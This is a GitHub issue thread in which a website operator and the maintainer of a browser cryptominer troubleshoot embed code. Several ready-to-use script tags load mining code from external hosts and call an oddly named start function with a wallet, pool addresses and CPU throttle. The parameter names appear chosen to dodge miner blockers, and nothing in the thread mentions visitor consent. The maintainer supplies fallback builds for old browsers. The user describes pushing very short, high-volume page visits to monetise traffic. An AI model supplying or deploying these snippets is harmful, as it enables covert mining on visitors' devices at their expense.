### ISSUE TITLE
Website integration support is needed

### ISSUE THREAD

**Issue by vpts1202** [PiTi2k5/Crypto-Webminer#29]
Hello

I have tested two of your scripts and it looks like I am doing something wrong.
1) Pools dashboard do not show any signs of life:)
2) CPU usage for both scripts are 25-30%, whereas I have configured 80%
3) In both scripts the same(?!) error message appearing:
Type	Message text
error	ReferenceError: EverythingIsLife is not defined at 
[https://my_website/]

The scripts I have used for tests are below:
1. ```
<script src="https://easyhash.de/mmh/mmh.js?perfekt=wss://?algo=cn/r?jason=gulf.moneroocean.stream:10004" > </script>
<script type="text/javascript">
EverythingIsLife('My_XMR_Wallet', 'x', 20);</script>
```
2. ```
<script src="https://easyhash.de/mmh/mmh.js?perfekt=wss://?algo=flex/native?jason=flex.eu.mine.zergpool.com:6435" > </script>
<script type="text/javascript">
EverythingIsLife('My_XMR_Wallet', 'c=XMR', 20);</script>
```
Please advise
Thanks

**Comment by PiTi2k5** [comment]
Hello, you need another script (script path) for EverythingIsLife method. Pure integration script has less and also other methods. Github project need PerfectStart method https://github.com/PiTi2k5/Crypto-Webminer/blob/34fcb6592e9388e44296df5bed42729ce307c931/scripts/gustav.js#L106C3-L106C15

This is the correct script path without a webmining UI
```
<script src="https://thelifewillbefine.de/karma/karma.js?karma=bs?algy=flex/native?nosaj=flex.eu.mine.zergpool.com:6435" ></script>
<script type="text/javascript">
EverythingIsLife('My_XMR_Wallet', 'c=XMR', 20);
</script>
```

**Comment by vpts1202** [comment]
I have tested both scripts you have provided in above. It does not work.
Below are the scripts and error messages received during the tests.
```
<script src="https://thelifewillbefine.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
<script type="text/javascript">
EverythingIsLife('My_XMR_Wallet', 'x', 20);
</script>
```
Errors message for above script:
Errors, warnings etc
Type	Message text
error	failed to asynchronously prepare wasm: CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value typ
error	Aborted(CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value type 's128', enable with --experim
error	RuntimeError: Aborted(CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value type 's128', enable .

```
<script src="https://thelifewillbefine.de/karma/karma.js?karma=bs?algy=flex/native?nosaj=flex.eu.mine.zergpool.com:6435" ></script>
<script type="text/javascript">
EverythingIsLife('My_XMR_Wallet', 'c=XMR', 20);
</script>
```
Errors message for above script:
Errors, warnings etc
Type	Message text
error	failed to asynchronously prepare wasm: CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value typ
error	Aborted(CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value type 'Simd128', enable with --expe
error	RuntimeError: Aborted(CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value type 'Simd128', enab
error	failed to asynchronously prepare wasm: CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value typ
error	Aborted(CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value type 'Simd128', enable with --expe
error	RuntimeError: Aborted(CompileError: WebAssembly.instantiate(): Compiling function #29 failed: invalid value type 'Simd128', enab

Please advise
Thanks

**Comment by vpts1202** [comment]
Thank you for your prompt feedback and assistance offering.
In fact for the tests I have used third-party app testing service that I am using for a years. In these particular tests 17 devices out of 4 different locations and edge, chrome and firefox browsers were used. So I do not think that the issue is in the browser. However, I do trust your opinion, since you are very long time on the market.
I will test now in couple of other app testing platforms. Nevertheless if you know how to universalize your script please do it, I will use it with great appreciation and mutual benefit in scale and stable traffic flow( as of now its +\-10MH/s in RandomX algo equivalent).
Thanks.

**Comment by PiTi2k5** [comment]
Without SIMD for old devices/browser (Take care, it will be slower)
```
<script src="https://thelifewillbefine.de/karma/karmaos.js?karma=bs?nosaj=faster.mo" ></script>
<script type="text/javascript">
EverythingIsLife('My_XMR_Wallet', 'x', 20);
</script>
```

Without SIMD and some other features for very old devices/browser (Take care, it will be slower)
```
<script src="https://thelifewillbefine.de/karma/karmaosob.js?karma=bs?nosaj=faster.mo" ></script>
<script type="text/javascript">
EverythingIsLife('My_XMR_Wallet', 'x', 20);
</script>
```

Test it and give me feedback please :)

**Comment by vpts1202** [comment]
Thank you!
I will test in boarder range both “problematic” scripts and two amended/modified options of script w/o SIMD, will let you know over this weekend or at the very beginning of next week, whatever results are.

**Comment by vpts1202** [comment]
Hello
In fact, I have found out where the issue is.
I am using high frequency, multithreaded traffic. The duration of connections(i.e. the time spent on page), are short and varies from 0,1 sec to 2,5sec.,so while I am connecting to your server the first hashing is going to your wallet (dev fees) then (in theory) hashes should start to flow to my wallet but connection is terminated. That’s why all my tests are shows that CPU/Memory usage looks fine but no hashes coming in/no signs of activity on pool dashboard.
Can you sort it out?
Thanks

**Comment by PiTi2k5** [comment]
That is not the issue, dev fee is only 1-2% of overall hashing speed/accepted shares from the same wallet. The main issue is the short connection time, your connection will never find a accepted shares (only valid shares will be rewarded by a mining pool not the hashing speed) you need connections for minimum 30sec (more is better)

**Comment by vpts1202** [comment]
I am using all main browsers very friendly shared streaming traffic which has nothing in common with disorderly requests flood(DDOS like) 
Your great attractiveness is wide range of product/algos basket, but all above of max 5sec., page hold is not competitive to simple traffic monetization. Anyway, for diversification purposes its make sense to continue experimenting with your products, just to be more selective in coin hashrate network and pool entrance difficulty requirements. So if I will have any further questions, I will come up again:) Thanks
